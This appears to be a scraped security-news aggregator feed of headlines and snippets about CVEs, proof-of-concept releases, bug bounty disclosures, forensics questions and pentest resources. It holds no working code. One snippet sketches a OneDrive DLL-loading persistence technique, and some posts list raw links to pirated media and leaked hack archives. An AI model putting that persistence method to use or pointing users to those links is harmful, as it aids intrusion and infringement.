    推荐系统排序环节的特征Embedding建模 by ourren 更多最新文章,请访问SecWiki
  • Open

    Crash Linux systems over the air (CVE-2022-42722 POC on an ESP32)
    Article URL: https://github.com/jo-m/linux-wifi-ota-crash Comments URL: https://news.ycombinator.com/item?id=33215265 Points: 24 # Comments: 1
    CVE-2022-42889 Apache Commons Text
    Article URL: https://nvd.nist.gov/vuln/detail/CVE-2022-42889 Comments URL: https://news.ycombinator.com/item?id=33211721 Points: 1 # Comments: 0
  • Open

    这45个账号安全风险,你check了吗?
    本文大家梳理了45个账号安全风险点,方便大家在账号安全管理中查缺补漏,从而建立更加全面的账号安全体系。
    浅析Tomcat架构上的Valve内存马(内存马系列篇十一)
    内存马系列的第十一篇,Tomcat Valve内存马实现。
  • Open

    Write-up: Infinite money logic flaw @ PortSwigger Academy
    No content preview
  • Open

    Write-up: Infinite money logic flaw @ PortSwigger Academy
    No content preview
  • Open

    Write-up: Infinite money logic flaw @ PortSwigger Academy
    No content preview
  • Open

    Events Ripper
    Not long ago, I made a brief mention of Events Ripper, a proof-of-concept tool I wrote to quickly provide situational awareness and pivot points for analysts who were already on the road to developing a timeline. The idea behind the tool is that artifacts are compound objects, and have value based not just on their time stamps, their value can also be predicated on the analysis questions or goals, or just the nature of their path, or some other factor.  The tool leverages the fact that analysts are already creating timelines, and uses the intermediate events file format to develop situational awareness and pivot points to facilitate analysis. Many times, we're looking through a timeline for some root cause or predicating event, but we're dealing with the fact that there was some normal sys…
  • Open

    How a Microsoft blunder opened millions of PCs to potent malware attacks
    submitted by /u/0xdea [link] [comments]
  • Open

    Recommended high speed port scanner?
    Should I use Spoonmap/DivideandScan/Rustscan and send the open ports to nmap for detailed scanning? Spoonmap https://github.com/trustedsec/spoonmap RustScan https://github.com/RustScan/RustScan DivideAndScan https://github.com/snovvcrash/DivideAndScan What are you pro's doing? submitted by /u/EquityMSP [link] [comments]

  • Open

    Alerting for Password Management Solution
    Hi AskNetSec We've recently onboarded 1Password as our Password Manager. Due to what happened with Uber recently where an actor was able to compromise their Password Manager which allowed them to access, everything and anything. I understand that we should use Role Based Access (RBAC), Multi Factor Authentication (MFA). Geoip Restrictions for example. However we send collect our Event Logs from 1Password and we ingest them into Datadog's Cloud SIEM. I've added an alarm to trigger if a user starts looking at many items. I wanted to ask what would you alert on if you had these activity logs. https://support.1password.com/events-reporting/ submitted by /u/CyberStagist [link] [comments]
    Is there a way to test Microsoft Authenticator MFA push notifications for all users?
    I believe Duo might have had a function where you could send a fake push notification to all users and see who clicks "Approve". Is there a similar method of doing this in a Microsoft environment with Microsoft Authenticator? Some Googling has not returned anything useful. Perhaps there is a pentesting tool that can do this? submitted by /u/dron3fool [link] [comments]
    Wanna get into Cybersecurity and don't know where to start
    As the title states I wanna get into cyber security, I'm not sure what route I should take in order to start learning, should I apply on an official company and pay for schooling or do I just take the DIY route, using skillshare, youtube, free websites etc. I have a pretty fair amount of experience in using python, I have mild experience using the CMD prompt on windows computers, I have always been comfortable easily removing any viruses or malware from my computers throughout my life, so I feel like the learning curve for getting into cybersec won't be too shallow, I just need advice on where to shove my foot in the door. Any advice would be greatly appreciated, thank you. submitted by /u/mrmclovinnn [link] [comments]
  • Open

    Zlib Critical Vulnerability
    Article URL: https://nvd.nist.gov/vuln/detail/CVE-2022-37434 Comments URL: https://news.ycombinator.com/item?id=33209096 Points: 19 # Comments: 1
    Windows CryptoAPI Spoofing Vulnerability
    Article URL: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-34689 Comments URL: https://news.ycombinator.com/item?id=33198603 Points: 2 # Comments: 0
  • Open

    CrowSec EdTech Write-up: Cockpit
    This challenge was really good , I learn about NoSQL Injection, manual manipulation of API and about privilege escalation with Crontab… Continue reading on Medium »
    RED Team, BLUE Team, PURPLE Team, Ethical Hacking y sus diferencias
    El panorama de la ciberseguridad evoluciona constantemente, y con ello, la terminología utilizada para describir diversos aspectos del… Continue reading on Medium »
    Cloudgoat AWS CTF solution- Scenerio 1 (vulnerable_lambda)
    Scenerio 1- vulnerable_lambda Continue reading on Medium »
    How Red Teaming Could Help with Management
    While red teams have been around since as early as the 19th century, it became popular in the United States military especially after 2003… Continue reading on Medium »
    Red Team Assessment Service In Singapore
    Highly Knowledge-Based Red Team Assessment Service In Singapore Continue reading on Medium »
  • Open

    Surfer TryHackMe walkthrough
    introduction Continue reading on Medium »
    Security is not in your fingerprint.
    How I bypassed biometric security using Flipper Zero Continue reading on Medium »
  • Open

    Surfer TryHackMe walkthrough
    introduction Continue reading on Medium »
    Security is not in your fingerprint.
    How I bypassed biometric security using Flipper Zero Continue reading on Medium »
  • Open

    CVE-2022–41542 Session Mis-Configuration in Devhub Application
    Session Misconfiguration is widely popular vulnerability. Continue reading on Medium »
    CVE-2022–33077: IDOR to change address of any customer via parameter pollution in nopCommerce <= 4.5
    TL;DR: A POST request to edit the address endpoint involved two addressID parameters (one in the URL and other in the request body)… Continue reading on Medium »
    Top 10 Best Bug Bounty Tools in 2022
    In today’s world, cybersecurity holds top priority for most organizations and governments. Large companies are investing millions of… Continue reading on Medium »
    Story about Escalation of HTML Injection to EC2 Instance credentials leak
    Hello all, Thank for overwhelming response here i am with my new finding tale. Continue reading on Medium »
    My Learning Methodology for Web Security
    Hello, to give something back to the infosec community I decided to start a new series on web application pen-testing. And this would be… Continue reading on Medium »
    PoC Exploit Released for Critical Fortinet Auth Bypass Bug Under?
    A proof-of-concept (PoC) exploit code has been made available for the recently disclosed critical security flaw affecting Fortinet FortiOS… Continue reading on Medium »
    Google SSO misconfiguration leading to Account Takeover
    I’m a technical guy. However, this post doesn’t contain any technical details, but that’s because this bug doesn’t require any.  I need to… Continue reading on Medium »
  • Open

    Host Header Injection on https:////Account/ForgotPassword
    U.S. Dept Of Defense disclosed a bug submitted by 0x1int: https://hackerone.com/reports/1679969
    Unauthenticated SQL Injection at [HtUS]
    U.S. Dept Of Defense disclosed a bug submitted by 0xd0ff9: https://hackerone.com/reports/1626226 - Bounty: $1000
    .git folder exposed [HtUS]
    U.S. Dept Of Defense disclosed a bug submitted by sudi: https://hackerone.com/reports/1624157
    Unauthenticated PII leak on verified/requested to be verified profiles on /app/org/{id}/profile/{id}/version/{id} [HtUS]
    U.S. Dept Of Defense disclosed a bug submitted by shreky: https://hackerone.com/reports/1627962
    Authentication bypass leads to Information Disclosure at U.S Air Force "https://"
    U.S. Dept Of Defense disclosed a bug submitted by ludv1k: https://hackerone.com/reports/1690548
    SSRF to read AWS metaData at https:/// [HtUS]
    U.S. Dept Of Defense disclosed a bug submitted by 720922: https://hackerone.com/reports/1624140 - Bounty: $1000
    Subdomain Takeover at http://.get8x8.com/
    8x8 disclosed a bug submitted by testingforbugs: https://hackerone.com/reports/1697402
    Found Origin IP's Lead To Access
    U.S. Dept Of Defense disclosed a bug submitted by ibrahim0936356: https://hackerone.com/reports/1556808
    Broken access discloses users and PII at https:// [HtUS]
    U.S. Dept Of Defense disclosed a bug submitted by g4mb4: https://hackerone.com/reports/1624374
    Local file read at https:/// [HtUS]
    U.S. Dept Of Defense disclosed a bug submitted by sudi: https://hackerone.com/reports/1626210 - Bounty: $1000
    [hta3] Chain of ESI Injection & Reflected XSS leading to Account Takeover on []
    U.S. Dept Of Defense disclosed a bug submitted by jr0ch17: https://hackerone.com/reports/1073780 - Bounty: $750
    [HTA2] Receiving access request on @wearehackerone.com email address
    U.S. Dept Of Defense disclosed a bug submitted by jr0ch17: https://hackerone.com/reports/715740 - Bounty: $750
    Blind SSRF via image upload URL downloader on https:///
    U.S. Dept Of Defense disclosed a bug submitted by 0x1int: https://hackerone.com/reports/1691501
    Account Takeover and Information update due to cross site request forgery via POST /registration/my-account.cfm
    U.S. Dept Of Defense disclosed a bug submitted by snifyak: https://hackerone.com/reports/1626356
    IDOR leaking PII data via VendorId parameter
    U.S. Dept Of Defense disclosed a bug submitted by 0x1int: https://hackerone.com/reports/1690044
    Account takeover on [HtUS]
    U.S. Dept Of Defense disclosed a bug submitted by nightm4re: https://hackerone.com/reports/1627961 - Bounty: $500
  • Open

    [PDF] Security Deep-Dive Into The Internals Of NetBackup - AirbusSecLab@Hexacon
    submitted by /u/alain_proviste [link] [comments]
    Microsoft Office 365 Message Encryption Insecure Mode of Operation
    submitted by /u/kekw32 [link] [comments]
    Exploiting predictable UUID/GUID values
    submitted by /u/dcthatch [link] [comments]
    Adobe Reader - XFA - ANSI-Unicode Confusion Information Leak
    submitted by /u/hacksysteam [link] [comments]
    FortiOS, FortiProxy, and FortiSwitchManager Authentication Bypass Technical Deep Dive (CVE-2022-40684) + PoC
    submitted by /u/mrkoot [link] [comments]
  • Open

    SecWiki News 2022-10-14 Review
    基于语音数据的实体和关系抽取 by ourren IM钓鱼防御方案 by ourren 威胁情报:重要的与不重要的 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-10-14 Review
    基于语音数据的实体和关系抽取 by ourren IM钓鱼防御方案 by ourren 威胁情报:重要的与不重要的 by ourren 更多最新文章,请访问SecWiki
  • Open

    NSFW................WtF
    Ok, don't click in tampon... https://bu64.myds.me:8081/Private/ Would say this is not hetero tastes... submitted by /u/xanderTgreat [link] [comments]
    Looks like Documentaries
    Slow site best rip & watch later... https://ftphost.nohum.net/video/ ( nounplural noun: documentaries A movie or a television or radio program that provides a factual record or report)... submitted by /u/xanderTgreat [link] [comments]
  • Open

    Pemaparan Materi OSINT & Challenge
    Tugas 7 Continue reading on Medium »
    The Castle’s Latrine
    Your keep is my keep. A story from when I worked for a previous employer. Continue reading on Medium »
    De l’infobésité à l’infopulence
    Depuis quelques années, on parle facilement d’infobésité pour évoquer la (trop) grande quantité d’information disponible, notamment grâce… Continue reading on Medium »
  • Open

    CVE-2022-42889: RCE in Apache Commons Text prior to 1.10.0
    Article URL: https://lists.apache.org/thread/n2bd4vdsgkqh2tm14l1wyc3jyol7s1om Comments URL: https://news.ycombinator.com/item?id=33204788 Points: 1 # Comments: 0
  • Open

    (Linux forensics - Volatility Profile Creation) - Solution for when "make" is not available on the target with a custom Linux kernel, and there is no internet connection?
    Let's say you have captured a memory dump on the target Linux machine using AVML, and now you want to create a volatility profile, which requires make to be present on the machine. But you have a target machine that is a custom kernel, and there is no internet connection because of restrictive environment, and they won't give you their kernel code so you can build it in a VM and create a profile there due to security reasons which is understandable. What are the solutions in this situation other than jumping out the window? How can i create the volatility profile without using make? submitted by /u/Ro0o0otkit [link] [comments]
  • Open

    Ransom Cartel Ransomware: A Possible Connection With REvil
    Ransom Cartel is ransomware as a service (RaaS) that exhibits several similarities to and technical overlaps with REvil ransomware. Read our overview. The post Ransom Cartel Ransomware: A Possible Connection With REvil appeared first on Unit 42.
  • Open

    Threat Hunting Series: Using Threat Emulation for Threat Hunting
    No content preview
    Exploit Eternal Blue (MS17–010) for Windows XP with custom payload
    No content preview
    Exploit Eternal Blue (MS17–010) for Window 7 and higher (custom payload)
    No content preview
  • Open

    Threat Hunting Series: Using Threat Emulation for Threat Hunting
    No content preview
    Exploit Eternal Blue (MS17–010) for Windows XP with custom payload
    No content preview
    Exploit Eternal Blue (MS17–010) for Window 7 and higher (custom payload)
    No content preview
  • Open

    Threat Hunting Series: Using Threat Emulation for Threat Hunting
    No content preview
    Exploit Eternal Blue (MS17–010) for Windows XP with custom payload
    No content preview
    Exploit Eternal Blue (MS17–010) for Window 7 and higher (custom payload)
    No content preview
  • Open

    FreeBuf早报 | Fortinet身份漏洞的POC已发布;接棒微软0path为WIN7提供服务
    最近披露的影响 Fortinet 严重安全漏洞已提供概念验证 (PoC) 漏洞利用代码,因此用户必须迅速采取行动以应用补丁。
    FreeBuf周报 | VMware某漏洞一年仍未修补;宜家智能照明系统发现漏洞
    我们总结推荐了本周的热点资讯、安全事件、一周好文和省心工具,保证大家不错过本周的每一个重点!
    Magniber勒索软件通过JavaScript文件感染Windows用户
    注意,在恢复数据之前,用户应确保其备份未被感染。
    Sangfor华东战队:Windows计算机取证【上】
    计算机取证是网络攻防战的一个重要领域,涉及收集在计算机上执行的活动的证据。
    Mysql等保2.0测评
    mysql数据库等保2.0测评
    混合云安全怎么做 | FreeBuf甲方群话题讨论
    企业部署混合云如何保障安全,同时兼顾高效管理与成本控制?
    SAST + SCA: 结合使用安全升级
    据 SAP 称,当今85%的安全攻击针对的是软件应用程序,因此一些列应用程序安全测试工具也应运而生。
  • Open

    What are the best certifications to get a job in the Pen Test field?
    I was curious about which certifications are valuable in the eyes of a company that's hiring a junior pen tester? Thank you. submitted by /u/Snoo_11846 [link] [comments]
  • Open

    Pre requisite skills for exploit dev
    Hi everyone, Hopefully this question is appropriate for this sub. If not I'll happily delete. I'm really interested in exploit development, have done basic buffer overflows without any protections etc. But I'm kind of feeling like I won't ever be at the point where I know enough about programming to actually be successful in exploit dev. My main question here is basically, How good to I have to be at programming before I'm able to achieve any kind of success (not monetary, just finding bugs in real targets for fun etc). I've done a basic amount of C (Caleb Currys course if anyones familiar) and some introductory ASM. I'm obviously going to keep learning as much as I can, but feel like I won't be able to learn enough about systems plus learn how to exploit things at a high level. Do most people who do exploit dev come from backgrounds where they're writing OS's and apps in C, or did you kind of just pick those things up as you learnt? Any advice would be awesome. Thanks :) submitted by /u/NoNameN3d [link] [comments]

  • Open

    [NSFW] Movies, TV Shows, Music, Software, eBooks, IPTV, Flash Games
    http://5.77.63.75/ - NSFW Siterips http://www.rnc3.net/media/ - Music https://www.mamalisa.com/mp3/ - Family Rhymes & Singalongs https://tworedcrayons.com/songs/ - Music http://pebbles99.com/ - Music http://www.floodkingz.org/ - eBooks (Survival, Coding, Security, Electronics, etc.) http://freebooks.lescigales.org/ - French eBooks (Romance) (NSFW I guess?) https://public-archive.org/ - Documents from past hacks/leaks (HackingTeam, FinFisher, etc.) http://eletrica.ufpr.br/graduacao/e-books/ - eBooks (Electrical Engineering) http://mtbplusiptv.com/ - IPTV M3U's (ESPN or a good PPV anyone?) https://www.igre24.net/games/ - Flash games http://mochipl.datatask.net/ - Flash games https://www.newmusicserver.com/songs/ - Music (a TON of music all genres) http://www.betezda.com/songs/ -…
    [NSFW] Music, sound effects, skin suit things
    http://78.203.242.230 => Sound effects, music https://82.65.97.128 => skin suits things, body/skin suit hentai/mangas, various triaged and untriaged videos http://82.66.65.53 => Music submitted by /u/MasterIO02 [link] [comments]
  • Open

    My journey with rate limit bypasses
    How do I bypass rate limits? Continue reading on Medium »
    Public Bug Bounty and Vulnerability Disclosure programs with less competition.
    1. Open Bug Bounty Community Continue reading on Medium »
    Initial word
    I love anything related to cyber security stuff especially red teaming, exploit/malware development. By day I learn new technologies in… Continue reading on Medium »
    The story of a [P5] that lead me to a [P3] find
    Helloo, Continue reading on Medium »
    SQL Injection in GraphQL
    Hello friends I’m Ahmed Gad This Is First Write-Up I Hope you like It Continue reading on Medium »
    Fall account takeover via Amazon Cognito misconfiguration
    Hello reader, I hope you are doing well. Today I want to talk about one of my findings. It was a public program and the bug is not fixed… Continue reading on Medium »
    OSCP : Complete Guide Part-1
    Hi everyone, so I’m sharing some resources & tools information which will be helpful in your OSCP journey. If you have a career in… Continue reading on System Weakness »
    AWS S3 bucket Misconfigurations and Exploitations
    — — — — — — — — — - AWS S3 bucket Misconfigurations — — — —— — Continue reading on Medium »
    Code flaws leads to Org/Admin Account Takeover
    Hello Everyone, I’m Saransh Saraf and I’m back with another unique account takeover idea, so let’s just dive into it :) Continue reading on Medium »
  • Open

    Self XSS in https://linkpop.com/dashboard/admin
    Shopify disclosed a bug submitted by hazemhussien99: https://hackerone.com/reports/1591403 - Bounty: $500
    Staff can create workflows in Shopify Admin without apps permission
    Shopify disclosed a bug submitted by jmp_35p: https://hackerone.com/reports/1521336 - Bounty: $1600
    XSS seems to work again after change to linkpop at https://linkpop.com/testnaglinagli
    Shopify disclosed a bug submitted by nagli: https://hackerone.com/reports/1569940 - Bounty: $1600
    Cross-site scripting on api.collabs.shopify.com
    Shopify disclosed a bug submitted by kun_19: https://hackerone.com/reports/1672459 - Bounty: $1600
    mail.acronis.com is vulnerable to zero day vulnerability CVE-2022-41040
    Acronis disclosed a bug submitted by aplis: https://hackerone.com/reports/1719719 - Bounty: $1000
    Misconfigured build on websites "abuse.cloudflare.com"
    Cloudflare Public Bug Bounty disclosed a bug submitted by paradessia_: https://hackerone.com/reports/1624911 - Bounty: $100
    DoS of https://research.adobe.com/ via CVE-2018-6389 exploitation
    Adobe disclosed a bug submitted by shirshak: https://hackerone.com/reports/1511628
    IDOR [mtnmobad.mtnbusiness.com.ng]
    MTN Group disclosed a bug submitted by insomnia_hax: https://hackerone.com/reports/1698006
  • Open

    Tenable.io vs. CSPM
    Wanted a simple explanation if Tenable.io (or .sc) can be replaced with a CSPM solution or if there is a great reason to keep Tenable if going fully to the cloud? Is there a need for a network scanner in the cloud or can I just point Wiz at my infra and figure out my vulnerabilities that way? submitted by /u/techwreck2020 [link] [comments]
    Learning curve for zeek
    I’m about to start a project with utilizing zeek. How difficult is it to use this product coming from limited Linux usage? What resources does this subreddit recommend to learn this tool? Thanks! submitted by /u/JoeyNonsense [link] [comments]
    academy for internet research
    Does anyone know any details about academyforinternetresearch.org. Or can you point me to a blog post or podcast where they discuss their mission and legitimacy. The whois data shows the address for "Aloha Ship and Pack Mililani" a FedEx mail center which is basically a front. They have their own AS: AS400161 which is comprised of two /24, one in Hawaii and one in Netherlands. I assume they do internet research scanning for open vulnerabilities and portscanning the internet for good I hope. I was hoping to understand the org and their mission a little more. submitted by /u/1hTD4eOyCrsJ [link] [comments]
    Which job is best for my career? I received 2 offer letters and can't decide.
    I have been applying and interviewing at companies for the past month and I received 2 offers recently. I graduated 2 months ago and have around 1.5 years exp of interning in roles including Security(6 months SOC, 6 months Security Research) and Devops(6 months). I have the CCNA, CEH, currently preparing for the OSCP and have lot of knowledge in a couple of security domains. Studied and practiced mostly on HTB, THM, Portswigger academy, Udemy courses, Homelab etc. CTC: the CTC is very similar for both companies and both have WFH and In-office (Hybrid work). Both salaries are according to industry standards for my exp in India. Company 1: Big Networking company, borderline Fortune 500, I will be joining the Incident Response team as a Security Engineer. Role: Member of International secu…
    NetSec: Any specific requirements or standards/policies for FL Doctors office?
    Hey everyone and thanks in advance for any help. My question is if anyone might know or point me in the direction of specific standards or policies that have to be followed for a medical/doctors office in securing their network to protect patient files? I know HIPAA would be at play as well in this specific situation but any tips or advice would be great. This is specifically related to the state of FL even though I’m sure there’s a nationwide standard submitted by /u/Shdwjokr [link] [comments]
    Providing OpenID Connect as only login option
    For an internet service I'm developing, I'm looking into providing only OpenID Connect options for authentication. However, I find it difficult to assess if that would keep out or add friction to the enrolment of some business users. Let's take an example: Companies use Azure AD My service accepts Microsoft as an IdP My service allows to login with the "Login with Microsoft" button. If a company uses Azure AD, does that mean that the "Login with Microsoft" button works out-of-the box or can they disable it in some cases? That is, if I have a "Log in with Microsoft" button, do I cover all Azure AD users without exception or would they have to explicitly set up a SSO integration? submitted by /u/pickled-munchkin [link] [comments]
    How important is it to attend security conferences if you work in application security?
    How important is it to attend security conferences if you work in application security? submitted by /u/herbertisthefuture [link] [comments]
    Keysight vision Tap/agg question
    I will be working with a vision x box in the next few months to work on monitoring traffic. What are some best practices those that have used this product? What are some things you wish you knew before hand? What recommendations do you have with using packet processing? What recommendations do you have with using app stack processing? The tools that potentially will be used is suricata or zeek. Haven’t decided which system yet. Sorry if this is all over this place. Any and all information would be greatly appreciated! submitted by /u/JoeyNonsense [link] [comments]
  • Open

    PiRogue Tool Suite Mobile forensic & network analysis on a Raspberry Pie
    submitted by /u/ResponsibleCat [link] [comments]
    How to Investigate Insider Threats (Forensic Methodology)
    submitted by /u/CyberMasterV [link] [comments]
    RPC Toolkit - security research oriented resources on MS-RPC (articles, PoCs, vulnerability write-ups, tools, etc.)
    submitted by /u/ophirharpaz [link] [comments]
    SafeSetID - a Linux Security Modules (LSM) you should know about
    submitted by /u/boutnaru [link] [comments]
    Private npm Packages Disclosed via Timing Attacks
    submitted by /u/mkatch [link] [comments]
    Bringing passkeys to Android & Chrome
    submitted by /u/Khryse [link] [comments]
  • Open

    It’s the Little Things : Breaking an AI
    No content preview
    Get yourself a rooted Android Virtual Device (AVD)
    No content preview
    Server Hardening with OpenSCAP
    No content preview
    TryHackMe writeup: Tools R Us
    ToolsRUs (“tryhackme”, 2019) is a fun little TryHackMe room that has its users “[p]ractise using tools such as dirbuster, hydra, nmap… Continue reading on InfoSec Write-ups »
  • Open

    It’s the Little Things : Breaking an AI
    No content preview
    Get yourself a rooted Android Virtual Device (AVD)
    No content preview
    Server Hardening with OpenSCAP
    No content preview
    TryHackMe writeup: Tools R Us
    ToolsRUs (“tryhackme”, 2019) is a fun little TryHackMe room that has its users “[p]ractise using tools such as dirbuster, hydra, nmap… Continue reading on InfoSec Write-ups »
  • Open

    It’s the Little Things : Breaking an AI
    No content preview
    Get yourself a rooted Android Virtual Device (AVD)
    No content preview
    Server Hardening with OpenSCAP
    No content preview
    TryHackMe writeup: Tools R Us
    ToolsRUs (“tryhackme”, 2019) is a fun little TryHackMe room that has its users “[p]ractise using tools such as dirbuster, hydra, nmap… Continue reading on InfoSec Write-ups »
  • Open

    Awesome Hacker Search Engines
    I've recently updated the GitHub repo containing search engines and online services useful for pentesting, general security, red team, bug bounty etc... Now it contains a lot of resources. This is the link: https://github.com/edoardottt/awesome-hacker-search-engines submitted by /u/edoardottt [link] [comments]
    lmao
    submitted by /u/ApepeApepeApepe [link] [comments]
    Pivoting Over Challenge Based Enterprise WiFi Network
    submitted by /u/tbhaxor [link] [comments]
    Java Android Magisk Burp Objection Root Emulator Easy (JAMBOREE)
    Java Android Magisk Burp Objection Root Emulator Easy (JAMBOREE) Updated Video Tutorial ! https://github.com/freeload101/Java-Android-Magisk-Burp-Objection-Root-Emulator-Easy Want to pentest or run Android apps in minutes ? Sick of BlueStacks or NOX malware/adware ? Not a single binary in this script and it's open source and downloads are direct from proper sources. There is lots of great powershell tricks (not great code) in this script. I worked hard on thing's like: making it portable as possible setting up and downloading extremely fast environment for Android, Java and Python converting ssl certs to Android without openssl using certutil.exe only I would like to make it even easier to use but I don't want to spend more time developing it if nobody is going to use it so please let me know if you like it and open bugs/suggestions/feature request etc! ​ If you're a mod about to remove this post can you do me the kind pleasure of telling me why and how I can help the community better please let me know. submitted by /u/rmccurdyDOTcom [link] [comments]
    Cobalt Strike - OneDrive DLL injection
    Advanced Persistent Threats (APTs) Ransomware threat actors are targeting more legitimate software's used in global companies like default backup solutions such as Microsoft OneDrive. Therefore, when investigating the missing OneDrive DLL's with ProcMon, the file "cscapi.dll" is loaded from "C:\Users\%USERNAME%\AppData\Local\Microsoft\OneDrive". This allows threat actors to gain persistence when end-user opens OneDrive since the DLL will be loaded in the process. https://youtu.be/bs_fMlw6DvE submitted by /u/EpicOfAllEpics [link] [comments]
  • Open

    Project ideas
    Hi everyone! I'm a final year student of Digital Forensics and Cyber Security, and I need to work on a year long project, possibly related to the subject of my degree. I have been thinking of Network Forensics; as my aim is to become an Incident Responder one day, going through the various SOC levels, I thought that working on PCAPs of a compromised network might be good to showcase to a future employer. Now, what I can't get my head around is how I could structure an investigation into a project that has the aim of finding a solution to a problem. And on top of that my degree requires code/scripting, no matter how many lines, as long as there's a programming language involved and the creation of an artefact. I'm familiar wih Python, however I'm still unsure on how I could use it for this specific purpose( many tools and libraries already use Python) and come up with something innovative. If someone more experienced has any tip or advice that would be really appreciated. Hope this post makes sense, otherwise please do ask questions if needed. Thank you very much in advance. submitted by /u/Pnigalion_ [link] [comments]
    The Linux Process Journey — PID 0 (swapper)
    submitted by /u/boutnaru [link] [comments]
    Using FTK Imager for ISO used by Autopsy
    Good Day, I am using a Kali Linux Live USB to run FTK imager on a Windows 10 machine. My goal is to make an image of the host machine and run it through Autopsy for processing. My Core issues is the CLI for FTK Imager. I can't seem to find DOCS related to the Image Format options. I know I can use "--e01" for an Encase format but I am not sure if that will work with Autopsy or if there is a better option that exist. Any Help Bros?.. and Bro-ettes submitted by /u/CyberSaintZero [link] [comments]
    GCFA
    Does anyone happen to know if there is any word on when a new GCFA will come out? Looking to take the GCFA but don't want to take it if there's a chance there will be a revamp relatively soon. submitted by /u/DeadBirdRugby [link] [comments]
    why an acquisition hash would be the same sometimes?
    sorry for the noob question ,im trynna understand why an acquisition hash would be the same in some cases and why they would be different on the others. i tried modifying an evidence file and the acquisition hash stayed the same . i tried the same thing but with a different evidence file and the acquisition hash changed and its now different than the original file. either my encase is glitching up or i got myself confused lol submitted by /u/shalnark90 [link] [comments]
    SANS course question
    Taking the SANS FOR500 course and making an index. When i’m done with the index what should I bring to staples to have them bind it? All of the workbooks I received? I never done it so just looking for some help! Also if anyone has any good tips/recommendations for indexing please drop them submitted by /u/Ok_Cockroach8022 [link] [comments]
  • Open

    PSRansom — Simulação de Ransomware com C2
    PSRansom ​​é um script escrito em PoweShell que permite simular o funcionamento de um Ransomware. É um script que você pode utilizar por… Continue reading on 100security »
    Initial word
    I love anything related to cyber security stuff especially red teaming, exploit/malware development. By day I learn new technologies in… Continue reading on Medium »
  • Open

    How to Securely Debug WordPress Errors on Your Website
    While working on or maintaining your WordPress website, you’ll inevitably encounter an error that prevents it from properly functioning. Knowing how to securely debug and troubleshoot WordPress is an exceptionally important skill. But there’s one important step you’ll want to take to prevent sensitive data exposure on your website. In this article, we’ll explore how to securely check and debug errors on WordPress so you can quickly (and safely) spot problems on your site. Continue reading How to Securely Debug WordPress Errors on Your Website at Sucuri Blog.
  • Open

    SecWiki News 2022-10-13 Review
    你所不知道的CRLF---header中潜藏的漏洞 by 蓝色淡风 对5.6w条xray结果的简单分析 by ourren Google云基础架构安全设计学习 by ourren 域内用户Hash获取方式总结 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-10-13 Review
    你所不知道的CRLF---header中潜藏的漏洞 by 蓝色淡风 对5.6w条xray结果的简单分析 by ourren Google云基础架构安全设计学习 by ourren 域内用户Hash获取方式总结 by ourren 更多最新文章,请访问SecWiki
  • Open

    OSINT in Metaverse
    To comprehend OSINT in the metaverse, we must first understand what these two terms mean. OSINT stands for Open-Source Intelligence. It… Continue reading on Medium »
  • Open

    RMI攻击Registry的两种方式
    概述RMI(Remote Method Invocation) :远程方法调用它使客户机上运行的程序可以通过网络实现调用远程服务器上的对象,要实现RMI,客户端和服务端需要共享同一个接口基础Client 和 Regisry 基于 Stub 和 Skeleton 进行通信,分别对应 RegistryImpl_Stub 和 RegistryImpl_Skel 两个类示例一个可以远程调用的接口,实现了R
    ”三哥“,核酸信息泄露该管管了!
    一旦核酸信息泄露,民众就几乎“裸奔了”,会给工作生活带来许多障碍。
    FreeBuf早报 | 工信部通报38款侵害用户权益 App;印度5G网络引发各种网络诈骗
    印度孟买警方就 5G 相关诈骗发出警告,骗子们通过提供升级到 5G 连接的指导来欺骗用户。
    听说网安人压力贼大?
    你最近感到压力山大吗?
    Nmap抓包分析与绕过Windows防火墙
    本文包含以下内容:1、Nmap抓包分析;2、内网下绕过Windows防火墙扫描存活主机。
    十大 CICD 安全风险(四)
    本篇文章中,我们将会了解凭据使用环境管理不善与不安全的系统配置,并给出相应的风险缓解建议。
    记一次内网靶场渗透测试(下)
    这周我们将分享如何使用CS来进行打靶,并给大家提供黄金票据的利用方法。
    企业内部钓鱼邮件演练指南
    近期天翼云安全实验室就实践了内部钓鱼邮件演练,并从演练中总结了一些技术经验。
    当我们谈论小程序安全时,我们在谈论什么
    小程序技术的安全研究,既是对基础安全问题的挖掘与思考,也是针对小程序的独特性进行安全性的研究。
  • Open

    Set Up an Android Hacking Lab for $0
    With the ever-increasing demand for mobile technology, it seems like there is an app to do just about anything you can think of, right on your cell phone. From banking to mobile gaming and even controlling the RGB lights installed in your home office, everything is interconnected now. With the rise of this functionality also... The post Set Up an Android Hacking Lab for $0 appeared first on TrustedSec.
  • Open

    CVE-2022-25237 Bonitasoft Platform RCE 漏洞分析
    作者:xxhzz@星阑科技PortalLab 原文链接:https://mp.weixin.qq.com/s/zGDZeG3_lz5IdJ-V4zZjhg 项目介绍 Bonitasoft 是一个业务自动化平台,可以更轻松地在业务流程中构建、部署和管理自动化应用程序;Bonita 是一个用于业务流程自动化和优化的开源和可扩展平台。 漏洞描述 在Bonitasoft Authorization漏...
  • Open

    CVE-2022-25237 Bonitasoft Platform RCE 漏洞分析
    作者:xxhzz@星阑科技PortalLab 原文链接:https://mp.weixin.qq.com/s/zGDZeG3_lz5IdJ-V4zZjhg 项目介绍 Bonitasoft 是一个业务自动化平台,可以更轻松地在业务流程中构建、部署和管理自动化应用程序;Bonita 是一个用于业务流程自动化和优化的开源和可扩展平台。 漏洞描述 在Bonitasoft Authorization漏...

  • Open

    Fact Check — Libyan Airlines Workers Protesting?
    Workers to protest outside Libyan Airlines office in Tripoli, Libya, Oct. 11. Increased security, localized transport disruptions likely. Continue reading on The Sleuth Sheet »
    Malaysian OSINT resource list guide
    In Malaysia even ASEAN, there is no one to compile resources locally like in Canada, South Africa, Australia, and Poland. Even researchers… Continue reading on Medium »
    My Second-“Dual”-Brain
    Basically, I’m literally trying to be the galaxy-brain meme. Continue reading on Medium »
  • Open

    The Open Cloud Vulnerability and Security Issue Database
    Article URL: https://www.cloudvulndb.org/ Comments URL: https://news.ycombinator.com/item?id=33185197 Points: 2 # Comments: 0
  • Open

    [NSFW] Movies, TV Shows, Music, Documents, eBooks
